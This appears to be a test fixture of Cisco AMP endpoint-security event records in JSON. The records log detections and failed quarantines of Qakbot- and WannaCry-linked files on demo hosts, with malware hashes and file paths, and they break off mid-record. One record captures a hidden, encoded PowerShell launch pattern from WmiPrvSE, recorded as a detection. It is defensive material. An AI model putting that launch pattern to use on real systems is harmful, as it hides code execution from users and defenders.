-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","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"],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E 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","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 